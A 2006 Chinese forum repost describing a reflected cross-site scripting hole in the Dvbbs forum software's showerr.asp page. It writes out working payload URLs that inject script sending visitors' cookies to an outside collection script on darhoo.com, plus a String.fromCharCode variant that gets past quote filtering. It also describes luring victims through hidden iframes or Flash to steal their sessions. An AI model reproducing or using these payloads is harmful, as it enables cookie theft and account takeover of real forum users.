中国德迷联盟 - GerFans.cn

 找回密码
 加入联盟

手机号码,快捷登录

一个动网论坛现存的跨站SCRIPT漏洞

[复制链接]
德國戰車 发表于 2006-8-6 10:41:59 | 显示全部楼层 |阅读模式
<DIV class=quote>前记:一年前学习的时候也看到这样的漏洞,去年的4或5月份的黑客防线也有过介绍~最近看到有人写了这篇文章~~故贴过来分享~~(危害较大~~可以盗取cookie~~)<BR>最近在很多高人研究下,各种论坛都惊现有关cookie的漏洞~~<BR><BR>这个漏洞一直存在的, 我一年多前就看别人提起了. 只是没人想深究它和利用起来有点技术困难, 所以动网并不知道, 或者并没有意识到这是个漏洞.<BR>大家先看看下面的地址:<BR>Code: <BR>bbs.dvbbs.net/showerr.asp?BoardID=1&amp;ErrCodes=24&amp;action=&lt;script&gt;location.href="<a>http://www.darhoo.com/getCookie.php?cookie=</A>"+document.cookie<BR><BR><BR>用这地址进入动网将会被重定向到darhoo.com. 而且把动网的COOKIE也会带过来了darhoo.com, 用getCookie.php存下来了.<BR><BR>你会说别人不会蠢到点你这地址啊? 其实不然的, 他们根本不需要点什么东西, 只要把上面的地址用一个隐藏的IFRAME或者甚至用FLASH文件藏起来, 放在darhoo.com主页上, 谁会知道你在看darhoo.com的时候, 网管在偷你的COOKIE呢? 哈! 只要你去动网发个广告, 然后就等着收COOKIE吧!<BR><BR>要利用这漏洞必须要有自己的服务器/论坛, 还要会编写一些简单的ASP/PHP什么的, 所以并不是很多人会弄, 这也可能导致了动网的疏忽吧?<BR><BR><BR>我自己试了一下, 发现竟然过滤了引号, 不过那也很容易绕过了, 改成下面就可以了:<BR><BR>Code: <BR>bbs.dvbbs.net/showerr.asp?BoardID=1&amp;ErrCodes=24&amp;action=&lt;script&gt;location.href=String.fromCharCode(72)%2BString.fromCharCode(84)%2BString.fromCharCode(84)%2BString.fromCharCode(80)%2BString.fromCharCode(58)%2BString.fromCharCode(47)%2BString.fromCharCode(47)%2BString.fromCharCode(68)%2BString.fromCharCode(65)%2BString.fromCharCode(82)%2BString.fromCharCode(72)%2BString.fromCharCode(79)%2BString.fromCharCode(79)%2BString.fromCharCode(46)%2BString.fromCharCode(67)%2BString.fromCharCode(79)%2BString.fromCharCode(77)%2BString.fromCharCode(47)%2BString.fromCharCode(65)%2BString.fromCharCode(46)%2BString.fromCharCode(80)%2BString.fromCharCode(72)%2BString.fromCharCode(80)%2BString.fromCharCode(63)%2BString.fromCharCode(65)%2BString.fromCharCode(61)%2Bdocument.cookie</DIV>
您需要登录后才可以回帖 登录 | 加入联盟

本版积分规则

小黑屋|手机版|Archiver|中国德迷联盟 - GerFans.cn ( 辽ICP备17002255号 )|网站地图

GMT+8, 2024-11-16 09:43 , Processed in 0.024438 second(s), 13 queries , Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表